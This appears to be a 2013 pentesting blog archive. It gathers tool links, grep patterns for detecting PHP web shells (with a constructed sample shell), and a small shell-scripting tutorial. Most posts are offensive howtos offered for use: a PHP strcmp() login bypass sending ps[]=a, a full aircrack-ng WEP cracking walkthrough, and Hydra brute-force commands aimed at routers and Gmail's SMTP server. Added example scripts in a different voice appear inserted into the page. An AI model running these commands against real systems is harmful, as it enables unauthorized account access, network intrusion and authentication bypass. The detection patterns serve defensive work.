Mar 9, 2013

Tools: Nishang - PowerShell for Pentesting

Nishang is a framework and collection of scripts and payloads which enables the use of PowerShell for offensive security and post-exploitation during Penetration Tests. The scripts were written to meet the author's own requirements during real Penetration Tests.

Source: https://code.google.com/p/nishang/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: BozoCrack - Google MD5 Crack Tool

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

Source: https://github.com/juuso/BozoCrack 


Mar 7, 2013

Howto: Grep Common Web Vulnerabilities And Backdoor Shell

If you want the full details of all the tests, please visit the Source.

Common Usage for Finding Vulnerabilities
- Command Injection
$ grep -Rn "shell_exec *(" /var/www
- LFI/RFI
$ grep -Rn "include *(" /var/www
$ grep -Rn "require *(" /var/www
$ grep -Rn "include_once *(" /var/www
$ grep -Rn "require_once *(" /var/www

Detect Backdoor Shell
$ grep -Rn "shell_exec *(" /var/www
$ grep -Rn "base64_decode *(" /var/www
$ grep -Rn "phpinfo *(" /var/www
$ grep -Rn "system *(" /var/www
$ grep -Rn "php_uname *(" /var/www
$ grep -Rn "chmod *(" /var/www
$ grep -Rn "fopen *(" /var/www
$ grep -Rn "fclose *(" /var/www
$ grep -Rn "readfile *(" /var/www
$ grep -Rn "edoced_46esab *(" /var/www
$ grep -Rn "eval *(" /var/www
$ grep -Rn "passthru *(" /var/www

or, all of them in one pass:
$ grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www
$ find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color

$ find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("
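The one-liners above are a heuristic, not a verdict: legitimate application code calls fopen() and system() too. The script below is an added example, not part of this post or of the rootcon write-up, that wraps the same pattern in a small triage workflow: it builds a constructed web root with one benign PHP file and one file that trips the heuristic, reports hits per file, and ranks files sitting under upload or temp directories first. It assumes a grep that supports -R, -E and --include (GNU grep and BSD grep both do); the -P pattern from the post is rewritten for -E, since "\(" is only a literal parenthesis.

```shell
#!/bin/sh
# Added example (not from the post or from rootcon's write-up): a small
# triage script around the post's grep pattern. Assumes grep with -R, -E
# and --include. The sample files are constructed and contain no payload,
# only the call names the heuristic keys on.

# Function names commonly seen in PHP web shells (the post's list).
SUSPICIOUS='(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|edoced_46esab) *\('

# Constructed sample tree: one benign page, one file in an upload directory
# that executes request parameters. Prints the root directory it created.
make_sample_webroot() {
    dir=$(mktemp -d)
    mkdir -p "$dir/app" "$dir/uploads"
    cat > "$dir/app/index.php" <<'EOF'
<?php
// Benign page: output-encodes user input, calls nothing on the list.
$name = htmlspecialchars($_GET['name'] ?? '');
echo "Hello, $name";
EOF
    cat > "$dir/uploads/img.php" <<'EOF'
<?php
// Constructed sample that trips the heuristic: a PHP file in an upload
// directory that passes request parameters to dangerous calls.
$cmd = $_GET['c'];
echo shell_exec($cmd);
eval(base64_decode($_POST['d']));
EOF
    printf '%s\n' "$dir"
}

# file:line:text for every suspicious call under $1. Exits 0 even with no
# hits, so callers running under set -e are not tripped by grep's status 1.
scan_webroot() {
    grep -RnE --include='*.php' "$SUSPICIOUS" "$1" || true
}

# Number of PHP files (not matching lines) with at least one hit: the unit
# a responder actually triages.
count_flagged_files() {
    grep -RlE --include='*.php' "$SUSPICIOUS" "$1" | wc -l | tr -d ' '
}

# Flagged files that live under an upload, tmp or cache path, relative to the
# web root. PHP that executes input from such a directory is the strongest
# lead the pattern alone can give; everything else needs a human look.
flagged_in_upload_dirs() {
    ( cd "$1" && grep -RlE --include='*.php' "$SUSPICIOUS" . \
        | grep -E '^\./(uploads?|tmp|cache)/' ) || true
}
```

Run scan_webroot on a real document root to get the raw file:line hits, then flagged_in_upload_dirs to see which of them sit where no PHP should be writable at all. Keep the pattern list in one variable so that adding a name (the post also greps for tcpflood and udpflood) changes every function at once.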

Source: blog.rootcon.org/2012/04/simple-kung-fu-grep-for-finding-common.html
 


Mar 6, 2013

Howto: Bypassing strcmp() function

If you want to see all the details of how this flaw was found, please go to the Source.
After analyzing the two cases described above I started "googling" for "strcmp php vulnerabilities" but did not find anything; then, by looking at the PHP documentation, I realized this function has only three possible return values:

int strcmp ( string $str1 , string $str2 )
Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal.

Obviously, we need to find a way to force strcmp to return 0 and be able to bypass line 5 (see above) without even knowing the password, so I started wondering what the return value would be if there is an error during the comparison. So, I prepared a quick test comparing str1 with an Array (or an Object) instead of another string:


$fields = array(
    'id' => '127.0.0.1',
    'ps' => 'bar'
);
$a = "danux";
if (strcmp($a, $fields) == 0) {
    echo "This is zero!!";
} else {
    echo "This is not zero";
}



And got below warning from PHP:

PHP Warning:  strcmp() expects parameter 2 to be string, array given in ...

But guess what? Voila! It also returns the string "This is zero!!". In other words, it returns 0 as if both values were equal.

So, the last but not least step is to send an Array in the "ps" POST parameter so that we can bypass line 5. After some research and help from my friend Joe B., I learned I can send an array this way:

id=127.0.0.1&ps[]=a

Notice that instead of sending "&ps=a", I also send the square brackets [] in the parameter name, which will send an array object!! Also notice that I am sending "id=127.0.0.1" so that I can get to line 9.
And after sending this POST request...


Source: http://danuxx.blogspot.com/2013/03/unauthorized-access-bypassing-php-strcmp.html




Tools: Web Shell For All By Security Aegis

Pentestmonkey's REVERSE php shell:

b374k-shell (PHP):

AJAX Shell:

Weevely Shell:

The fuzzdb backdoor collection:

The laudanum set of injectable code:

Source: http://www.securityaegis.com/web-shells-for-all-2/




Howto: Extract IP Address From String

After I used a function to return the IP address from some task, I got "^[[H^[[2J" before the IP address. So I wanted to extract the IP from ^[[H^[[2J192.168.1.1. I used a regular expression to extract it, as in this example.

The result from the function:
gw=^[[H^[[2J192.168.1.1
In the shell script, I write it like this:
gw=$(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' <<< "$gw")
Now my $gw will be 192.168.1.1
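The grep above keeps the first thing that looks like a dotted quad, but [0-9]{1,3} also accepts 999.999.999.999, so a garbled line can hand back something that is not an address at all. The helpers below are an added example, not part of the original post, and go one step further than it: they collect every candidate in the string and keep the first one whose octets are all 0-255. Plain POSIX sh, no bashisms; the sample input is constructed, with the same ESC[H ESC[2J clear-screen sequence (shown as ^[[H^[[2J above) in front of the address.

```shell
#!/bin/sh
# Added example (not from the post): extract IPv4 candidates from a string
# that also carries terminal control sequences, then range-check the octets.
# The sample input is constructed; \033[H\033[2J is the clear-screen
# sequence the post saw as ^[[H^[[2J.
SAMPLE_GW=$(printf 'gw=\033[H\033[2J192.168.1.1')

# All dotted-quad candidates in $1, one per line (may be empty). -a forces
# text mode so the control bytes cannot make grep treat the input as binary.
ipv4_candidates() {
    printf '%s\n' "$1" | grep -aoE '[0-9]{1,3}(\.[0-9]{1,3}){3}' || true
}

# Same behaviour as the post's one-liner: first candidate, no range check.
extract_ipv4() {
    ipv4_candidates "$1" | head -n 1
}

# Status 0 if $1 is a well-formed IPv4 address with every octet in 0-255.
valid_ipv4() {
    case $1 in
        *[!0-9.]* | .* | *. | *..* | '') return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1                      # split on dots into $1..$n
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# First candidate that passes valid_ipv4 on stdout; status 1 if none does.
first_valid_ipv4() {
    for cand in $(ipv4_candidates "$1"); do
        if valid_ipv4 "$cand"; then
            printf '%s\n' "$cand"
            return 0
        fi
    done
    return 1
}
```

In the post's script the replacement would be gw=$(first_valid_ipv4 "$gw") || exit 1, so that a missing or malformed gateway stops the script instead of silently producing an empty or bogus $gw.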


Mar 5, 2013

Howto: Cracking Router Password using THC Hydra

hydra -l username -P password_list_path -s router_port Router_IP_Address http-get /

Source: http://blog.hicubes.com/2013/03/cracking-router-password-using-thc-hydra-in-backtrack-tutorial.html

 


Howto: Create function in Shell Script

This post is an example of writing functions in a shell script.

Syntax
function_name()
{
     statement...
     statement...
     statement...
}

The Normal Function
hello()
{
         echo "$1"
}

hello "world"
The output will be: world

The Return Function#1
hello()
{
         echo >&2 "$1"
         echo "return"
}
msg=$(hello "world")
echo [$msg]
The output will be:
world
[return]

The Return Function#2
hello()
{
         echo "$1"
         echo "return"
}
msg=$(hello "world")
echo [$msg]
The output will be:
[world return]

The Local Function
local_value()
{
         local value=23
         echo "Value in function is [$value]"
}
local_value
### Now try to print the value outside of function
echo "Value outside function is [$value]"
exit 0

The output will be:
Value in function is [23]
Value outside function is []

The Recursive Function
fact()
{
         local number=$1
         # Variable "number" must be declared as local,
         # otherwise the nested calls overwrite it and this doesn't work.
         if [ "$number" -eq 0 ]
         then
                  factorial=1         # Factorial of 0 = 1.
         else
                  decrnum=`expr "$number" - 1`
                  # Recursive call. The value comes back on stdout and is captured
                  # with $(...); $? only holds an exit status (0-255), not the result.
                  factorial=`expr "$number" \* $(fact "$decrnum")`
         fi
         echo "$factorial"
}
echo "Factorial of $1 is $(fact "$1")."
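The examples above use two different channels to get something out of a function: the exit status and standard output. The block below is an added example, not from the original post, that shows each channel in its intended role: a predicate that only sets a status, a function that prints its value and reports failure through its status (with its error text on stderr so it never ends up inside a captured value), and a caller that combines both. The exit status is a single byte, 0-255, which is why a computed number such as a factorial has to travel through stdout.

```shell
#!/bin/sh
# Added example (not from the post): the two return channels of a shell
# function. Exit status (0-255, tested by "if" or read with $?) says whether
# the call succeeded; standard output (captured with $(...)) carries the value.

# Pure predicate: status only, no output, so it reads naturally in "if".
is_even() {
    [ $(( $1 % 2 )) -eq 0 ]
}

# Value on stdout, failure via status. The error message goes to stderr so
# a $(...) caller can never mistake it for the value.
safe_div() {
    if [ "$2" -eq 0 ]; then
        echo "safe_div: division by zero" >&2
        return 1
    fi
    echo $(( $1 / $2 ))
}

# Caller pattern: test one function's status, capture another's value, and
# map each failure to its own non-zero status for the next caller up.
halve_if_even() {
    if ! is_even "$1"; then
        echo "halve_if_even: $1 is odd" >&2
        return 2
    fi
    half=$(safe_div "$1" 2) || return 3
    echo "$half"
}
```

Because safe_div writes its message to stderr, half=$(safe_div ...) stays empty on failure instead of containing the error text, and the || return 3 turns that failure into a status the caller can act on.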


Mar 4, 2013

Howto: Crack Wireless WEP without Client

1. Enable promiscuous (monitor) mode
airmon-ng start wlan0

2. Try to find the clients and the AP.
airodump-ng mon0

3. Dump the traffic of a specific AP.
airodump-ng --bssid target_mac_ap -c 6 mon0

4. Fake authentication to make the attacker machine a client of the AP
aireplay-ng -1 0 -a target_mac_ap -h attacker_mac mon0

or make the fake authentication with keep-alive packets
aireplay-ng -1 6000 -o 1 -q 10 -a target_mac_ap -h attacker_mac -e ESSID_AP mon0

5. Make the chop-chop attack or the fragment attack
aireplay-ng --fragment -b target_mac_ap -h attacker_mac mon0

6. While you capture or run the fragment attack, if you find a packet with "FromDS 1", that packet should work for forging a data packet.

7. Use packetforge-ng to create the data packet
packetforge-ng --arp -a target_mac_ap -h attacker_mac -l 255.255.255.255 -k 255.255.255.255 -y file-that-FromDS1.xor -w fileoutput

8. Use aireplay-ng to replay our forged data packet. (You should see "ToDS 1")
aireplay-ng --interactive -r fileoutput mon0

9. Try to capture again with
airodump-ng --bssid target_mac_ap -c channel_number -w save_capture_file mon0

10. Crack it with aircrack-ng
aircrack-ng save_capture_file.pcap


Howto: Use Hydra to Brute Force Gmail.com

hydra -S -l test@gmail.com -P wordlist.txt -e ns -V -s 465 smtp.gmail.com smtp 


